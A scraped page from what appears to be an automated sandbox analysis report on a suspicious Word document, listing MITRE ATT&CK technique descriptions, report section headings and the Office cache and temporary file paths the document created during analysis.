Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nnxPt0Yydv.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{0CEDFB9A-672A-495E-A8C3-4E2E5CC4FEA5}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5B8C97A2-8D5D-4690-A237-D6E0C46FC601}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1024203777.test[1].html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1024203777.test[1].html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF4F663.html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E5395CD.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC5065FC.html

C:\Users\user\AppData\Local\Temp\{532AFB91-0C3D-4187-B83C-71D1E2833CCF}

C:\Users\user\AppData\Local\Temp\{F2BDA7F7-D38F-4DB4-86AB-78594ACAB021}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nnxPt0Yydv.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$xPt0Yydv.doc

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
nnxPt0Yydv.doc

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre